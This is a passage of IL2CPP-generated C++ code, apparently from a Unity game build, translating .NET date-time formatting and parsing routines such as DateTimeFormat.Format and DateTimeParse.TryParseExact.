L_42 = ___dtfi2; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_43 = ___dtfi2; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_44 = *((DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F **)L_43); RuntimeObject * L_45 = DateTimeFormatInfo_Clone_m72D6280296E849FF0BD23A282C1B5ECC81EAF6BA(L_44, /*hidden argument*/NULL); *((RuntimeObject **)L_42) = (RuntimeObject *)((DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F *)CastclassSealed((RuntimeObject*)L_45, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_il2cpp_TypeInfo_var)); Il2CppCodeGenWriteBarrier((RuntimeObject **)L_42, (RuntimeObject *)((DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F *)CastclassSealed((RuntimeObject*)L_45, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_il2cpp_TypeInfo_var))); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_46 = ___dtfi2; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_47 = *((DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F **)L_46); Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_48 = DateTimeFormatInfo_get_Calendar_mFC8C8E19E118F8EE304B8C359E57EFD25EE2F862(L_47, /*hidden argument*/NULL); Type_t * L_49 = Object_GetType_m2E0B62414ECCAA3094B703790CE88CBB2F83EA60(L_48, /*hidden argument*/NULL); RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_50 = { reinterpret_cast<intptr_t> (GregorianCalendar_tC611DFF7946345F7AF856B31987FEECB98DEE005_0_0_0_var) }; IL2CPP_RUNTIME_CLASS_INIT(Type_t_il2cpp_TypeInfo_var); Type_t * L_51 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_50, /*hidden argument*/NULL); bool L_52 = Type_op_Inequality_m615014191FB05FD50F63A24EB9A6CCA785E7CEC9(L_49, L_51, /*hidden argument*/NULL); if (!L_52) { goto IL_0154; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_53 = ___dtfi2; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_54 = *((DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F **)L_53); IL2CPP_RUNTIME_CLASS_INIT(GregorianCalendar_tC611DFF7946345F7AF856B31987FEECB98DEE005_il2cpp_TypeInfo_var); Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_55 = GregorianCalendar_GetDefaultInstance_m36338D53A3A355D00060E57621CFDD610C83D87A(/*hidden argument*/NULL); DateTimeFormatInfo_set_Calendar_m6388B63636828B8525557FA2976C965897E8BF3C(L_54, L_55, /*hidden argument*/NULL); } IL_0154: { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * L_56 = ___dateTime1; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * L_57 = ___dateTime1; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_58 = DateTime_ToUniversalTime_mA8B74D947E186568C55D9C6F56D59F9A3C7775B1((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)L_57, /*hidden argument*/NULL); *(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)L_56 = L_58; } IL_0160: { String_t* L_59 = ___format0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_60 = ___dtfi2; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_61 = *((DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F **)L_60); IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); String_t* L_62 = DateTimeFormat_GetRealFormat_mAAA9091BEC0C4473B1D7377152247CEFD2BC4ED0(L_59, L_61, /*hidden argument*/NULL); ___format0 = L_62; String_t* L_63 = ___format0; return L_63; } } // System.String System.DateTimeFormat::Format(System.DateTime,System.String,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormat_Format_m3324809CE00998580E953F539E93153ADBB8447A (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___dateTime0, String_t* ___format1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeFormat_Format_m3324809CE00998580E953F539E93153ADBB8447A_MetadataUsageId); s_Il2CppMethodInitialized = true; } { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_0 = ___dateTime0; String_t* L_1 = ___format1; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_2 = ___dtfi2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_3 = ((DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var))->get_NullOffset_0(); String_t* L_4 = DateTimeFormat_Format_mA965A0AFBC1F2DA20C56B16652515CB08F515CFC(L_0, L_1, L_2, L_3, /*hidden argument*/NULL); return L_4; } } // System.String System.DateTimeFormat::Format(System.DateTime,System.String,System.Globalization.DateTimeFormatInfo,System.TimeSpan) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormat_Format_mA965A0AFBC1F2DA20C56B16652515CB08F515CFC (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___dateTime0, String_t* ___format1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___offset3, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeFormat_Format_mA965A0AFBC1F2DA20C56B16652515CB08F515CFC_MetadataUsageId); s_Il2CppMethodInitialized = true; } bool V_0 = false; int32_t V_1 = 0; { String_t* L_0 = ___format1; if (!L_0) { goto IL_000e; } } { String_t* L_1 = ___format1; int32_t L_2 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_1, /*hidden argument*/NULL); if (L_2) { goto IL_0099; } } IL_000e: { V_0 = (bool)0; int64_t L_3 = DateTime_get_Ticks_mBCB529E43D065E498EAF08971D2EB49D5CB59D60((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___dateTime0), /*hidden argument*/NULL); if ((((int64_t)L_3) >= ((int64_t)((int64_t)864000000000LL)))) { goto IL_0063; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_4 = ___dtfi2; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_5 = DateTimeFormatInfo_get_Calendar_mFC8C8E19E118F8EE304B8C359E57EFD25EE2F862(L_4, /*hidden argument*/NULL); int32_t L_6 = VirtFuncInvoker0< int32_t >::Invoke(7 /* System.Int32 System.Globalization.Calendar::get_ID() */, L_5); V_1 = L_6; int32_t L_7 = V_1; switch (((int32_t)il2cpp_codegen_subtract((int32_t)L_7, (int32_t)3))) { case 0: { goto IL_005a; } case 1: { goto IL_005a; } case 2: { goto IL_0063; } case 3: { goto IL_005a; } case 4: { goto IL_0063; } case 5: { goto IL_005a; } } } { int32_t L_8 = V_1; if ((((int32_t)L_8) == ((int32_t)((int32_t)13)))) { goto IL_005a; } } { int32_t L_9 = V_1; if ((!(((uint32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_9, (int32_t)((int32_t)22)))) <= ((uint32_t)1)))) { goto IL_0063; } } IL_005a: { V_0 = (bool)1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_il2cpp_TypeInfo_var); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_10 = DateTimeFormatInfo_get_InvariantInfo_mF4896D7991425B6C5391BB86C11091A8B715CCDC(/*hidden argument*/NULL); ___dtfi2 = L_10; } IL_0063: { TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_11 = ___offset3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_12 = ((DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var))->get_NullOffset_0(); IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); bool L_13 = TimeSpan_op_Equality_mEA0A4B7FDCAFA54C636292F7EB76F9A16C44096D(L_11, L_12, /*hidden argument*/NULL); if (!L_13) { goto IL_0085; } } { bool L_14 = V_0; if (!L_14) { goto IL_007c; } } { ___format1 = _stringLiteralA0F1490A20D0211C997B44BC357E1972DEAB8AE3; goto IL_0099; } IL_007c: { ___format1 = _stringLiteralA36A6718F54524D846894FB04B5B885B4E43E63B; goto IL_0099; } IL_0085: { bool L_15 = V_0; if (!L_15) { goto IL_0091; } } { ___format1 = _stringLiteral53CE4A69C239125FEAFB3AAB705BEF29027E8CC9; goto IL_0099; } IL_0091: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_16 = ___dtfi2; String_t* L_17 = DateTimeFormatInfo_get_DateTimeOffsetPattern_mF5E6E8E53ED7C8B1262F04DCC2AC8E951FDF2060(L_16, /*hidden argument*/NULL); ___format1 = L_17; } IL_0099: { String_t* L_18 = ___format1; int32_t L_19 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_18, /*hidden argument*/NULL); if ((!(((uint32_t)L_19) == ((uint32_t)1)))) { goto IL_00b0; } } { String_t* L_20 = ___format1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); String_t* L_21 = DateTimeFormat_ExpandPredefinedFormat_m61BDA6D452DFDB96A8CB7369474886DE29C5395A(L_20, (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___dateTime0), (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F **)(&___dtfi2), (TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)(&___offset3), /*hidden argument*/NULL); ___format1 = L_21; } IL_00b0: { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_22 = ___dateTime0; String_t* L_23 = ___format1; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_24 = ___dtfi2; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_25 = ___offset3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); String_t* L_26 = DateTimeFormat_FormatCustomized_mB01ABBA7E73E58981F9742722B2CD39DDBBCA619(L_22, L_23, L_24, L_25, /*hidden argument*/NULL); return L_26; } } // System.Void System.DateTimeFormat::InvalidFormatForLocal(System.String,System.DateTime) extern "C" IL2CPP_METHOD_ATTR void DateTimeFormat_InvalidFormatForLocal_m9049D2389DBF1FCAD1AF3E98F2B462E17104053B (String_t* ___format0, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___dateTime1, const RuntimeMethod* method) { { return; } } // System.Void System.DateTimeFormat::InvalidFormatForUtc(System.String,System.DateTime) extern "C" IL2CPP_METHOD_ATTR void DateTimeFormat_InvalidFormatForUtc_m0E9CACD473EA60B086EAD03C09488869673E109D (String_t* ___format0, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___dateTime1, const RuntimeMethod* method) { { return; } } // System.Void System.DateTimeFormat::.cctor() extern "C" IL2CPP_METHOD_ATTR void DateTimeFormat__cctor_m767ECD160CF93F838EF10AF7C197BF3002A39D34 (const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeFormat__cctor_m767ECD160CF93F838EF10AF7C197BF3002A39D34_MetadataUsageId); s_Il2CppMethodInitialized = true; } { IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_0 = ((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_StaticFields*)il2cpp_codegen_static_fields_for(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var))->get_MinValue_2(); ((DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var))->set_NullOffset_0(L_0); CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* L_1 = (CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2*)SZArrayNew(CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2_il2cpp_TypeInfo_var, (uint32_t)((int32_t)19)); CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* L_2 = L_1; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_3 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____375F9AE9769A3D1DA789E9ACFE81F3A1BB14F0D3_23_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_2, L_3, /*hidden argument*/NULL); ((DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var))->set_allStandardFormats_1(L_2); StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* L_4 = (StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E*)SZArrayNew(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E_il2cpp_TypeInfo_var, (uint32_t)7); StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* L_5 = L_4; ArrayElementTypeCheck (L_5, _stringLiteralB6589FC6AB0DC82CF12099D1C2D40AB994E8410C); (L_5)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(0), (String_t*)_stringLiteralB6589FC6AB0DC82CF12099D1C2D40AB994E8410C); StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* L_6 = L_5; ArrayElementTypeCheck (L_6, _stringLiteralFB96549631C835EB239CD614CC6B5CB7D295121A); (L_6)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(1), (String_t*)_stringLiteralFB96549631C835EB239CD614CC6B5CB7D295121A); StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* L_7 = L_6; ArrayElementTypeCheck (L_7, _stringLiteral8AEFB06C426E07A0A671A1E2488B4858D694A730); (L_7)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(2), (String_t*)_stringLiteral8AEFB06C426E07A0A671A1E2488B4858D694A730); StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* L_8 = L_7; ArrayElementTypeCheck (L_8, _stringLiteral39DFA55283318D31AFE5A3FF4A0E3253E2045E43); (L_8)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(3), (String_t*)_stringLiteral39DFA55283318D31AFE5A3FF4A0E3253E2045E43); StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* L_9 = L_8; ArrayElementTypeCheck (L_9, _stringLiteral6934105AD50010B814C933314B1DA6841431BC8B); (L_9)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(4), (String_t*)_stringLiteral6934105AD50010B814C933314B1DA6841431BC8B); StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* L_10 = L_9; ArrayElementTypeCheck (L_10, _stringLiteralC984AED014AEC7623A54F0591DA07A85FD4B762D); (L_10)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(5), (String_t*)_stringLiteralC984AED014AEC7623A54F0591DA07A85FD4B762D); StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* L_11 = L_10; ArrayElementTypeCheck (L_11, _stringLiteral4E079D0555E5A2B460969C789D3AD968A795921F); (L_11)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(6), (String_t*)_stringLiteral4E079D0555E5A2B460969C789D3AD968A795921F); ((DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var))->set_fixedNumberFormats_2(L_11); return; } } #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.DateTime System.DateTimeParse::ParseExact(System.String,System.String,System.Globalization.DateTimeFormatInfo,System.Globalization.DateTimeStyles) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTimeParse_ParseExact_m53595CD96FF504A940A435D43F084A8BE08CBDCD (String_t* ___s0, String_t* ___format1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, int32_t ___style3, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_ParseExact_m53595CD96FF504A940A435D43F084A8BE08CBDCD_MetadataUsageId); s_Il2CppMethodInitialized = true; } DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB V_0; memset(&V_0, 0, sizeof(V_0)); { il2cpp_codegen_initobj((&V_0), sizeof(DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB )); DateTimeResult_Init_m6CA70DCCC2BF43E42B46A3275082E2E89726869D((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)(&V_0), /*hidden argument*/NULL); String_t* L_0 = ___s0; String_t* L_1 = ___format1; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_2 = ___dtfi2; int32_t L_3 = ___style3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_4 = DateTimeParse_TryParseExact_m3A1B2D674B4C6AA4F1768B10FCF311D54006DFDE(L_0, L_1, L_2, L_3, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)(&V_0), /*hidden argument*/NULL); if (!L_4) { goto IL_0023; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB L_5 = V_0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_6 = L_5.get_parsedDate_11(); return L_6; } IL_0023: { IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); Exception_t * L_7 = DateTimeParse_GetDateTimeParseException_m26091CD2EBBFFEA867F71D3910742714FF38F733((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)(&V_0), /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_7, NULL, DateTimeParse_ParseExact_m53595CD96FF504A940A435D43F084A8BE08CBDCD_RuntimeMethod_var); } } // System.Boolean System.DateTimeParse::TryParseExact(System.String,System.String,System.Globalization.DateTimeFormatInfo,System.Globalization.DateTimeStyles,System.DateTimeResult&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_TryParseExact_m3A1B2D674B4C6AA4F1768B10FCF311D54006DFDE (String_t* ___s0, String_t* ___format1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, int32_t ___style3, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result4, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_TryParseExact_m3A1B2D674B4C6AA4F1768B10FCF311D54006DFDE_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = ___s0; if (L_0) { goto IL_0018; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_1 = ___result4; DateTimeResult_SetFailure_m718CC7D41E722D8310669F2E8788E30B8B5AA184((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_1, 1, _stringLiteralF81B4F09A85F55DDC3FFCA77898383A75640AA15, NULL, _stringLiteralA0F1490A20D0211C997B44BC357E1972DEAB8AE3, /*hidden argument*/NULL); return (bool)0; } IL_0018: { String_t* L_2 = ___format1; if (L_2) { goto IL_0030; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_3 = ___result4; DateTimeResult_SetFailure_m718CC7D41E722D8310669F2E8788E30B8B5AA184((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_3, 1, _stringLiteralF81B4F09A85F55DDC3FFCA77898383A75640AA15, NULL, _stringLiteral785987648F85190CFDE9EADC69FC7C46FE8A7433, /*hidden argument*/NULL); return (bool)0; } IL_0030: { String_t* L_4 = ___s0; int32_t L_5 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_4, /*hidden argument*/NULL); if (L_5) { goto IL_0048; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_6 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_6, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0048: { String_t* L_7 = ___format1; int32_t L_8 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_7, /*hidden argument*/NULL); if (L_8) { goto IL_0060; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_9 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_9, 2, _stringLiteral3647A113CA9819A53C36BF6083C7027C975BE2B5, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0060: { String_t* L_10 = ___s0; String_t* L_11 = ___format1; int32_t L_12 = ___style3; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_13 = ___dtfi2; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_14 = ___result4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_15 = DateTimeParse_DoStrictParse_m404C0A9C38726E4B07EE689493F4BAFBEEA50E15(L_10, L_11, L_12, L_13, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_14, /*hidden argument*/NULL); return L_15; } } // System.Boolean System.DateTimeParse::MatchWord(System.__DTString&,System.String) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_MatchWord_mC620454975484A06318A4488BA503D763B98EE34 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, String_t* ___target1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_MatchWord_mC620454975484A06318A4488BA503D763B98EE34_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; int32_t V_1 = 0; { String_t* L_0 = ___target1; int32_t L_1 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_0, /*hidden argument*/NULL); V_0 = L_1; int32_t L_2 = V_0; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_3 = ___str0; String_t* L_4 = L_3->get_Value_0(); int32_t L_5 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_4, /*hidden argument*/NULL); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_6 = ___str0; int32_t L_7 = L_6->get_Index_1(); if ((((int32_t)L_2) <= ((int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_5, (int32_t)L_7))))) { goto IL_001e; } } { return (bool)0; } IL_001e: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_8 = ___str0; CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * L_9 = __DTString_get_CompareInfo_mE0381FC6A1AB82E0BDAF45F848568124B193FB51((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_8, /*hidden argument*/NULL); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_10 = ___str0; String_t* L_11 = L_10->get_Value_0(); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_12 = ___str0; int32_t L_13 = L_12->get_Index_1(); int32_t L_14 = V_0; String_t* L_15 = ___target1; int32_t L_16 = V_0; int32_t L_17 = VirtFuncInvoker7< int32_t, String_t*, int32_t, int32_t, String_t*, int32_t, int32_t, int32_t >::Invoke(8 /* System.Int32 System.Globalization.CompareInfo::Compare(System.String,System.Int32,System.Int32,System.String,System.Int32,System.Int32,System.Globalization.CompareOptions) */, L_9, L_11, L_13, L_14, L_15, 0, L_16, 1); if (!L_17) { goto IL_003e; } } { return (bool)0; } IL_003e: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_18 = ___str0; int32_t L_19 = L_18->get_Index_1(); String_t* L_20 = ___target1; int32_t L_21 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_20, /*hidden argument*/NULL); V_1 = ((int32_t)il2cpp_codegen_add((int32_t)L_19, (int32_t)L_21)); int32_t L_22 = V_1; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_23 = ___str0; String_t* L_24 = L_23->get_Value_0(); int32_t L_25 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_24, /*hidden argument*/NULL); if ((((int32_t)L_22) >= ((int32_t)L_25))) { goto IL_006f; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_26 = ___str0; String_t* L_27 = L_26->get_Value_0(); int32_t L_28 = V_1; Il2CppChar L_29 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_27, L_28, /*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_il2cpp_TypeInfo_var); bool L_30 = Char_IsLetter_mCC7F387F16C2DE7C85B6A1A0C5BC75D92A813DFE(L_29, /*hidden argument*/NULL); if (!L_30) { goto IL_006f; } } { return (bool)0; } IL_006f: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_31 = ___str0; int32_t L_32 = V_1; L_31->set_Index_1(L_32); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_33 = ___str0; int32_t L_34 = L_33->get_Index_1(); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_35 = ___str0; int32_t L_36 = L_35->get_len_2(); if ((((int32_t)L_34) >= ((int32_t)L_36))) { goto IL_009b; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_37 = ___str0; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 